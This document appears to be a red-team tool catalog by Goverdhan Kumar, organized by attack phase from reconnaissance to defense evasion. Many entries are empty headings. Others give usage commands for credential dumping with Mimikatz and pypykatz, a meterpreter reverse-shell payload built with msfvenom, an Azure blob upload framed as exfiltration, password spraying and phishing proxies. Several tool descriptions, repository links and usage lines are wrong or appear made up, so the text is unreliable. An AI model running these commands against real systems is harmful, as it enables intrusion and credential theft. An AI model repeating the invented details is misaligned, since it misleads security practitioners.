GOVERDHAN KUMAR
RED TEAM TOOLS BY GOVERDHAN KUMAR
INTRODUCTION
Catalog
RECONNAISSANCE 1
1. RustScan: 1
2. NmapAutomator: 1
3. AutoRecon: 1
4. Amass: 1
5. CloudEnum: 2
6. Recon-NG: 2
7. AttackSurfaceMapper: 2
8. DNSDumpster: 2
INITIAL ACCESS 2
1. SprayingToolKit: 2
2. o365Recon: 3
3. Psudohash: 3
4. CredMaster: 3
5. DomainPasswordSpray: 3
6. TheSprayer: 3
7. TREVORspray: 3
DELIVERY 4
1. o365AttackToolKit: 4
2. EvilGinx2: 4
3. GoPhish: 4
4. PwnAuth: 5
5. Modlishka: 5
COMMAND AND CONTROL 5
1. PoshC2: 5
2. Sliver: 5
3. SILENTTRINITY: 6
4. Empire: 6
5. AzureC2Relay: 6
6. Havoc C2: 7
7. Mythic C2: 7
CREDENTIAL DUMPING 7
1. MimiKatz: 7
2. HekaTomb: 8
3. SharpLAPS: 8
4. Net-GPPPassword: 8
5. PyPyKatz: 8
PRIVILEGE ESCALATION 9
1. SharpUp: 9
2. MultiPotato: 9
3. PEASS - Privilege Escalation Awesome Scripts SUITE: 9
4. Watson: 9
5. Bat-Potato: 10
DEFENSE EVASION 10
1. Villain: 10
2. EDRSandBlast: 10
3. SPAWN - Cobalt Strike BOF: 10
4. NetLoader: 11
5. KillDefenderBOF: 11
CONCLUSION 11
RECONNAISSANCE
1. RustScan:
Description: RustScan is a fast port scanner that identifies open ports and services on target
systems quickly.
Installation: You can install RustScan using Rust's package manager, Cargo. Run these commands:
2. NmapAutomator:
3. AutoRecon:
4. Amass:
Description: Amass is a versatile tool for subdomain enumeration and information gathering.
Installation: Download the tool from the GitHub repository: https://github.com/OWASP/Amass
Usage: Use commands like `amass enum` and `amass intel` followed by relevant flags and
options.
5. CloudEnum:
Description: CloudEnum identifies cloud resources and assets related to a target domain.
Installation: Download from GitHub repository: https://github.com/initstring/cloud_enum
Usage: Run `python3 cloud_enum.py --domain target.com` to perform cloud-based
reconnaissance.
6. Recon-NG:
Description: Recon-NG is a powerful reconnaissance framework that gathers data from various
sources.
Installation: It's pre-installed in Kali Linux. For other systems, follow the guide here:
https://github.com/lanmaster53/recon-ng
Usage: Launch `recon-ng` and execute modules using commands like `use`, `options`, and `run`.
7. AttackSurfaceMapper:
8. DNSDumpster:
Description: DNSDumpster is an online tool for finding DNS information and subdomains.
Usage: Visit the website https://dnsdumpster.com/, enter the target domain, and analyze the
results.
INITIAL ACCESS
1. SprayingToolKit:
2. o365Recon:
3. Psudohash:
Description: Psudohash generates password candidates using permutations and rules for
password cracking.
Installation: Download from GitHub repository: https://github.com/DominicBreuker/psudohash
Usage: Run `psudohash -p password_rules.txt -r rules.txt` to create password permutations.
4. CredMaster:
Description: CredMaster is a tool for crafting malicious documents to capture credentials during
phishing attacks.
Installation: Download from GitHub repository: https://github.com/0xZDH/CredMaster
Usage: Edit `CredMaster.py` with your settings and run it using `python3 CredMaster.py`.
5. DomainPasswordSpray:
6. TheSprayer:
7. TREVORspray:
Description: TREVORspray is a password spraying tool designed for Office 365 environments.
DELIVERY
1. o365AttackToolKit:
2. EvilGinx2:
Description: EvilGinx2 is a tool for advanced phishing attacks, capturing credentials through
browser-based techniques.
Installation: Download from GitHub repository: https://github.com/kgretzky/evilginx2
Usage:
Configure the config.yaml file to set up target domains and phishing scenarios.
To start the server:
python3 evilginx.py -p config.yaml
The tool acts as a proxy, capturing credentials as users interact with the phishing pages.
3. GoPhish:
Description: GoPhish is an open-source phishing framework that enables you to create and
manage phishing campaigns.
Installation: Download from GitHub repository: https://github.com/gophish/gophish
Usage:
Start the GoPhish server:
./gophish
Access the GoPhish web interface and create a new campaign.
Customize email templates, landing pages, and other campaign details.
Launch the campaign and monitor the results through the dashboard.
4. PwnAuth:
Description: PwnAuth is a tool for performing password spraying and credential stuffing attacks
against authentication services.
Installation: Download from GitHub repository: https://github.com/fireeye/PwnAuth
Usage:
Configure the config.yaml file with target URLs and other settings.
To perform a password spraying attack:
./pwnauth.py -c config.yaml --password-list passwords.txt
The tool will attempt to authenticate using the provided passwords against the target URLs.
5. Modlishka:
Description: Modlishka is a reverse proxy tool that automates phishing attacks, capturing user
credentials through an authentic-looking interface.
Installation: Download from GitHub repository: https://github.com/drk1wi/Modlishka
Usage:
Configure the config.cfg file with target domain and redirect URL.
To start Modlishka:
./modlishka -config config.cfg
Modlishka acts as a reverse proxy, intercepting user traffic and capturing credentials.
COMMAND AND CONTROL
1. PoshC2:
Description: PoshC2 is a post-exploitation framework that allows you to establish command and
control channels with compromised systems.
Installation: Download from GitHub repository: https://github.com/nettitude/PoshC2
Usage:
Set up the config.yaml file with your preferences.
Start the PoshC2 server:
./PoshC2.py
Use the PoshC2 client for controlling compromised hosts and managing your post-exploitation
activities.
2. Sliver:
Usage:
Configure the config file with your settings.
Start the Sliver server:
./sliver
Use the Sliver client for controlling compromised hosts and performing post-exploitation
actions.
3. SILENTTRINITY:
4. Empire:
Description: Empire is a powerful post-exploitation framework that offers various modules for
controlling and managing compromised systems.
Installation: Download from GitHub repository: https://github.com/BC-SECURITY/Empire
Usage:
Start the Empire server:
./empire
Access the Empire web interface using a web browser (default: https://localhost:1337) to
manage agents and launch modules.
Example: Launch a PowerShell module on a compromised host:
usemodule management/psinject
set Name MyScript
set Listener http
set Agent 1
set Command "Write-Host 'Hello from Empire'"
execute
5. AzureC2Relay:
Description: AzureC2Relay is a tool for setting up covert channels using Azure services for
command and control purposes.
Installation:
Download from GitHub repository: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105.002/AzureC2Relay.md
Follow the detailed instructions provided in the repository.
Usage:
Configure the Azure resources as per the instructions in the repository.
Deploy and utilize the AzureC2Relay to establish covert channels.
Example: Use the covert channel for data exfiltration:
az login
az storage blob upload --account-name <storage_account> --account-key <storage_key> --container-name <container_name> --name <blob_name> --type block --source <local_file_path>
6. Havoc C2:
Description: Havoc C2 is a cross-platform C2 server and agent for managing and controlling
compromised systems.
Installation: Download from GitHub repository: https://github.com/cobbr/Havoc
Usage:
Follow the repository's README for installation and configuration.
Start the Havoc C2 server and deploy agents on compromised hosts.
Example: Start the Havoc C2 server and deploy an agent:
./havoc -l <listening_ip> -p <listening_port>
python3 havoc-cli.py -t <target_ip> -a <agent_name>
7. Mythic C2:
CREDENTIAL DUMPING
1. MimiKatz:
Description: MimiKatz extracts plaintext passwords and hashes from memory or registry, aiding
in credential theft.
Installation: Download from GitHub repository: https://github.com/gentilkiwi/mimikatz
Usage:
Build MimiKatz by running:
make
Extract credentials from memory:
sekurlsa::logonpasswords
Extract credentials from LSASS process:
sekurlsa::minidump lsass.dmp
2. HekaTomb:
Description: HekaTomb is a toolset for dumping Windows credentials from memory using
various techniques.
Installation: Download from GitHub repository: https://github.com/Technowlogy-Pushpender/hekatomb
Usage:
Dump credentials using Mimikatz-like commands:
hekatomb.py procdump lsass
Extract credentials from LSASS dump:
hekatomb.py parse lsass_dump.dmp
3. SharpLAPS:
4. Net-GPPPassword:
5. PyPyKatz:
Description: PyPyKatz is a Python library and toolset for parsing and interacting with LSA secrets
in memory dumps.
Installation: Download from GitHub repository: https://github.com/skelsec/pypykatz
Usage:
Install dependencies:
pip install -r requirements.txt
Parse LSA secrets from a memory dump:
pypykatz lsa minidump lsass.dmp
PRIVILEGE ESCALATION
1. SharpUp:
Description: SharpUp is a tool that helps identify potential privilege escalation paths by
querying system information.
Installation: Download from GitHub repository: https://github.com/GhostPack/SharpUp
Usage:
Build SharpUp:
csc.exe /out:SharpUp.exe /platform:x64 /target:exe SharpUp.cs
Execute SharpUp:
SharpUp.exe all
2. MultiPotato:
3. PEASS - Privilege Escalation Awesome Scripts SUITE:
Description: PEASS is a suite of scripts designed to help with Windows privilege escalation.
Installation: Download from GitHub repository: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
Usage:
Navigate to the specific technique's directory, e.g., Windows-Exploit-Suggester.
Run the script to identify potential vulnerabilities:
./windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database 2021-08-11-mssb.xls --systeminfo systeminfo.txt
4. Watson:
Usage:
Run Watson:
Watson.exe
5. Bat-Potato:
Description: Bat-Potato is a Windows Privilege Escalation tool that helps automate common
privilege escalation methods.
Installation: Download from GitHub repository: https://github.com/EmpireProject/Bat-Potato
Usage:
Run Bat-Potato:
powershell.exe -ExecutionPolicy Bypass -File bat-potato.ps1
DEFENSE EVASION
1. Villain:
Description: Villain is a tool for bypassing security measures, like AV and EDR, by modifying
existing executables.
Installation: Download from GitHub repository: https://github.com/edwardz246003/Villain
Usage: Follow the instructions provided in the repository's README to install and utilize the tool.
python3 villain.py -i input.exe -o output.exe
2. EDRSandBlast:
3. SPAWN - Cobalt Strike BOF:
Description: SPAWN is a Cobalt Strike Beacon Object File (BOF) that helps evade EDR solutions.
Installation: Download from GitHub repository: https://github.com/r3dQu1nn/SPAWN
Usage: Follow the instructions in the README for building and using the BOF with Cobalt Strike.
4. NetLoader:
Description: NetLoader is a technique to load shellcode via a .NET assembly to evade security
mechanisms.
Installation: Download from GitHub repository: https://github.com/Flangvik/NetLoader
Usage:
Create a custom .NET assembly containing your shellcode:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=your_port -f csharp > shellcode.cs
5. KillDefenderBOF:
Description: KillDefenderBOF is a Cobalt Strike Beacon Object File (BOF) that attempts to disable
Windows Defender.
Installation: Download from GitHub repository:
https://github.com/edwardz246003/KillDefenderBOF
Usage: Refer to the repository's README for building and using the BOF with Cobalt Strike.
CONCLUSION
In the realm of offensive security operations, a diverse toolkit is essential for effective red teaming.
This compilation presents a wide array of tools categorized by their functions, enabling security
professionals to carry out thorough assessments and simulations. From reconnaissance and initial
access to delivery, command and control, credential dumping, privilege escalation, and defense
evasion, each tool plays a crucial role in the red teaming process.
It's important to emphasize that these tools should only be used in ethical and authorized contexts,
ensuring that no harm is caused to legitimate systems or networks. Ethical hacking and penetration
testing help organizations identify vulnerabilities, improve defenses, and ultimately enhance overall
cybersecurity posture.
As the landscape of cybersecurity continues to evolve, the knowledge and skills to responsibly wield
these tools become increasingly valuable. Remember, the success of red teaming lies not just in the
tools themselves, but in the expertise, strategy, and ethical considerations that guide their application.
Follow:
https://www.linkedin.com/in/goverdhankumar
https://github.com/wh04m1i
https://linktr.ee/g0v3rdh4n
https://instagram.com/who4m1i